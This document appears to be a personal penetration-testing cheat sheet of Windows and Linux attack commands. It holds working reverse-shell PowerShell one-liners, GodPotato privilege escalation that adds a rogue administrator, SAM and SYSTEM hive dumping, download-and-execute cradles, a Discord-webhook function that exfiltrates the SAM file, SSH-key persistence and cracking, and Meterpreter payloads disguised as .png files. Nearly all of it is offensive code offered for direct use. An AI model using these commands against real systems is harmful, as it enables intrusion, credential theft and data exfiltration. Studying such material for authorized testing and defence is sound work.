.\GodPotato-NET4.exe -cmd "net user /add kalihacker kalihacker123" #Add Admin User
.\GodPotato-NET4.exe -cmd "net localgroup administrators /add kalihacker" #Add Admin User
or
.\GodPotato-NET4.exe -cmd "net user administrator kalihacker123" #Change Admin passwordShadow Copy
reg save hklm\sam 'C:\Windows\Temp\sam'
reg save hklm\system 'C:\Windows\Temp\system'
reg save hklm\security 'C:\Windows\Temp\security'
impacket-secretsdump -sam SAM -system SYSTEM localWebshell → PowerShell reverse (Windows):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP",8443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Upgrade TTY (Linux):
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then:
# Ctrl+Z
stty echo -raw; fg
export TERM=xtermGet Stable SSH Connection:
# Your Machine:
$ ssh-keygen -t rsa -b 4096
$ cat oscpb.pub
# Target Machine:
$ mkdir -p ~/.ssh
$ chmod 700 ~/.ssh
$ echo "ssh-rsa AAAAB3... your@email" >> ~/.ssh/authorized_keys
$ chmod 600 ~/.ssh/authorized_keys
$ ssh -i oscpb user@target_ipMore SSH Keys things:
/home/<USER>/.ssh/authorized_keys #User can be obtained in /etc/passwd
/home/<USER>/.ssh/id_ecdsa(This cipher can be get via the above)
ssh2john priv_key > key.hash
john key.hash --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i priv_key <USER>@<IP> -p <PORT>Downloaders (Windows):
msiexec /q /i https://github.com/kalinathalie/qualquercoisa.txt
certutil.exe -urlcache -split -f "https://github.com/kalinathalie/qualquercoisa.txt" c:\windows\temp\agoravai.txt
powershell -c "iwr('https://github.com/kalinathalie/qualquercoisa.txt')|iex"
powershell -c "iwr('http://10.10.14.3/file.exe') -OutFile file.exe"
powershell -nop -exec bypass -w 1 iex(New-Object net.webclient).DownloadString('http://10.10.14.3/file.exe')
powershell wget http://ip/file.exe -O file.exeZip a directory (Windows PowerShell):
Add-Type -AssemblyName System.IO.Compression.FileSystem
[IO.Compression.ZipFile]::CreateFromDirectory('D:/OpaOpa', 'C:/Temp/OpaOpa.zip')Search files (Windows):
Get-ChildItem C:\ -recurse -include "access.log"FINDSTR /L /S /I /N /C:"algo" *.txt
findstr /s /m /c:"password" *Encode payload to PowerShell Base64
echo -n 'iex "$env:TEMP\shell.ps1"' | iconv -t UTF-16LE | base64 -w0Upload to Discord (Windows function):
function Upload-Discord {
[CmdletBinding()]
param(
[parameter(Position=0,Mandatory=$False)][string]$file,
[parameter(Position=1,Mandatory=$False)][string]$text
)
$Body = @{ 'username' = $env:username; 'content' = $text }
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
}
Upload-Discord -file "C:\Windows\System32\config\SAM" -text "Key-File"Upload via Discord (Linux):
# from cloned repo
./discord.sh --webhook-url="$WEBHOOK" --file file.txtSimple Flask upload receiver (Linux):
from flask import Flask, request
app = Flask(__name__)
@app.route('/upload', methods=['POST'])
def upload_file():
if 'file' not in request.files:
return 'No file part'
file = request.files['file']
if file.filename == '':
return 'No selected file'
file.save(file.filename)
return 'File uploaded successfully'
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)curl.exe -X POST -F "file=@C:\Docs\arquivo.pdf" http://10.10.14.6:5000/uploadInstall Metasploit (Linux):
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.runListener (HTTPS) and Payload (Windows):
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 10.100.100.10
set LPORT 4444
run
msfvenom -p windows/meterpreter/reverse_https LHOST=10.100.100.10 LPORT=4444 -f exe > agoravai.png
# Transfer, then:
Rename-Item -Path "c:\windows\temp\agoravai2.png" -NewName "agoravai2.exe"
cd c:\windows\temp
.\agoravai2.exe
# Alt output type
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.100.100.10 LPORT=4444 -f msi > 100security.png
or
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.229 LPORT=1337 -f exe -o file.exe
nc -vnlp 1337Unicorn helper (MSHTA payload):
https://github.com/karemfaisal/SMUC/blob/master/MSHTA/Mshta.md
python3 unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
# In msfconsole:
use multi/handler
set payload windows/meterpreter/reverse_https
run -j
/bin/neo4j start
bloodhound-python -u 'user' -p 'passa' -ns 10.129.251.246 -dc DC01.feast.com -d feast.com -v -c all (The best)
bloodhound-python -u 'user' -p 'passa' -ns 10.129.251.246 --disable-autogc -d domain.local -v
# NTLM auth example:
bloodhound-python -d domain.yzx -u 'user'@domain.yzx -p 'pass' --auth-method ntlm -c all,LoggedOn -ns 192.168.224.97 --dns-timeout 10 -dc DC01.secura.yzx
bloodhoundDNS dump helper (Linux):
python3 dnsdump.py -u 'user' -p 'senha' DCBypass APT bloecked:
https://http.kali.org/README?mirrorlist
sudo tee /etc/apt/apt.conf.d/99ua <<'EOF'
Acquire::https::User-Agent "curl/8.15.0";
Acquire::http::User-Agent "curl/8.15.0";
Acquire::http::Pipeline-Depth "0";
Acquire::ForceIPv4 "true";
Acquire::https::Timeout "60";
EOF
sudo apt -o Debug::Acquire::https=true updateExecute EXE and save output (Windows):
cmd /c "file.exe > output.txt"Windows → PowerShell switching (CMD to PS):
CMD -> PowerShell (powershell.exe)
Pro tip: Windows port-scan when minimal tooling only:
for x in {1..4096}; do
curl -s -m 2 172.16.22.1:"$x"
[ "$?" -ne "7" ] && [ "$?" -ne "28" ] && echo "[+] Port $x open"
doneQuick testssl example:
./testssl.sh --color 3 --warnings=batch --quiet --ip one -s -p -U -E https://www.google.com- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn
- linWinPwn: https://github.com/lefayjey/linWinPwn
End of organized notes.